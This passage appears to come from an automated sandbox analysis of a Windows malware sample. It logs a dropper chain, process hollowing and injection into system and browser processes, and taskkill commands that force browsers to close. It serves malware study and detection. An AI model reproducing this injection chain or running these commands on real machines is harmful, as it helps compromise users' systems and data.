                      Source: C:\Windows\explorer.exeMemory protected: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1AD70400000 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1E494510000 protect: page execute read
                      Source: C:\Windows\System32\svchost.exeThread created: C:\Windows\explorer.exe EIP: 89BAA50
                      Source: C:\Windows\explorer.exeThread created: C:\Program Files\Mozilla Firefox\firefox.exe EIP: 2C28AA50
                      Source: C:\Windows\explorer.exeThread created: C:\Program Files\Mozilla Firefox\firefox.exe EIP: AA10AA50
                      Source: C:\Windows\explorer.exeThread created: C:\Program Files\Mozilla Firefox\firefox.exe EIP: 636DAA50
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 7041AA50
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: DD3DAA50
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 9452AA50
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeNtUnmapViewOfSection: Indirect: 0x7FF68E6923DC
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeNtUnmapViewOfSection: Indirect: 0x7FF61B9823DC
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF220000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD0000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000 value starts with: 4D5A
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 89A0000 value starts with: 4D5A
                      Source: C:\Windows\explorer.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 2392C270000 value starts with: 4D5A
                      Source: C:\Windows\explorer.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 144AA0F0000 value starts with: 4D5A
                      Source: C:\Windows\explorer.exeMemory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1A2636C0000 value starts with: 4D5A
                      Source: C:\Windows\explorer.exeMemory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1AD70400000 value starts with: 4D5A
                      Source: C:\Windows\explorer.exeMemory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 20DDD3C0000 value starts with: 4D5A
                      Source: C:\Windows\explorer.exeMemory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1E494510000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD0000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF220000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000 value starts with: 4D5A
                      Source: C:\Windows\System32\svchost.exeMemory written: PID: 3968 base: 89A0000 value: 4D
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeThread register set: target process: 4812
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeThread register set: target process: 5048
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeThread register set: target process: 4952
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeThread register set: target process: 5212
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeThread register set: target process: 5956
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeThread register set: target process: 6760
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7DF220000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF6BCBD0000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6DAB80000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF6BCBD0000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7DF220000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6DAB80000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF220000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF221000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF225000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF227000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF228000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF229000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF22A000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\svchost.exe base: C5B80A8010
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD0000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD1000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD5000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD7000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD8000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD9000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBDA000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\msiexec.exe base: 48EE857010
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB81000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB85000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB87000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB88000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB89000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB8A000
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory written: C:\Windows\System32\audiodg.exe base: BE8C9A8010
                      Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 89A0000
                      Source: C:\Windows\explorer.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 2392C270000
                      Source: C:\Windows\explorer.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 144AA0F0000
                      Source: C:\Windows\explorer.exeMemory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1A2636C0000
                      Source: C:\Windows\explorer.exeMemory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1AD70400000
                      Source: C:\Windows\explorer.exeMemory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 20DDD3C0000
                      Source: C:\Windows\explorer.exeMemory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1E494510000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD0000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD1000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD5000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD7000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD8000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD9000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBDA000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\msiexec.exe base: 6F9A273010
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF220000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF221000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF225000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF227000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF228000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF229000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7DF22A000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\svchost.exe base: 24DA922010
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB81000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB85000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB87000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB88000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB89000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB8A000
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory written: C:\Windows\System32\audiodg.exe base: 2597563010
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe "C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe "C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe "C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe "C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeProcess created: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                      Source: 602c785fe5.exe, 0000001B.00000002.2524820308.0000000000622000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                      Source: explorer.exe, 00000014.00000000.2217813962.00000000096A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3077307447.00000000096A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2203536690.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000014.00000000.2203536690.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000014.00000000.2203536690.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                      Source: skotes.exe, skotes.exe, 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: gProgram Manager
                      Source: explorer.exe, 00000014.00000000.2202639819.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
                      Source: explorer.exe, 00000014.00000000.2203536690.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F88D10 cpuid 9_2_00007FF643F88D10
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: GetLocaleInfoEx,FormatMessageA,9_2_00007FF643F5DF9C
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_00007FF643F84568
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: GetLocaleInfoW,9_2_00007FF643F84618
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00007FF643F8474C
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: EnumSystemLocalesW,9_2_00007FF643F78874
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_00007FF643F841C8
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: GetLocaleInfoW,9_2_00007FF643F84410
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: GetLocaleInfoW,9_2_00007FF643F78D4C
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: EnumSystemLocalesW,9_2_00007FF643F84060
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: EnumSystemLocalesW,9_2_00007FF643F84130
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,9_2_00007FF643F83D04
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: GetLocaleInfoEx,FormatMessageA,11_2_00007FF68459DF9C
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_00007FF6845C4568
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: GetLocaleInfoW,11_2_00007FF6845C4618
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00007FF6845C474C
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: EnumSystemLocalesW,11_2_00007FF6845B8874
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00007FF6845C41C8
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: GetLocaleInfoW,11_2_00007FF6845C4410
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: GetLocaleInfoW,11_2_00007FF6845B8D4C
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: EnumSystemLocalesW,11_2_00007FF6845C4060
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: EnumSystemLocalesW,11_2_00007FF6845C4130
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,11_2_00007FF6845C3D04
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: EnumSystemLocalesW,12_2_00007FF711D632A0
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00007FF711D6398C
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: EnumSystemLocalesW,12_2_00007FF711D5A4A8
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00007FF711D63408
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: EnumSystemLocalesW,12_2_00007FF711D63370
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,12_2_00007FF711D63650
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,12_2_00007FF711D63858
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,12_2_00007FF711D5A83C
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_00007FF711D637A8
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,12_2_00007FF711D62F44
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoEx,FormatMessageA,12_2_00007FF711D4AF50
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: GetLocaleInfoEx,FormatMessageA,13_2_00007FF61DD9DF9C
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: GetLocaleInfoW,13_2_00007FF61DDB8D4C
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: EnumSystemLocalesW,13_2_00007FF61DDC4130
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: EnumSystemLocalesW,13_2_00007FF61DDC4060
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,13_2_00007FF61DDC3D04
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: GetLocaleInfoW,13_2_00007FF61DDC4618
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_00007FF61DDC4568
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: EnumSystemLocalesW,13_2_00007FF61DDB8874
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_00007FF61DDC474C
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_00007FF61DDC41C8
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: GetLocaleInfoW,13_2_00007FF61DDC4410
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exe VolumeInformationJump to behavior
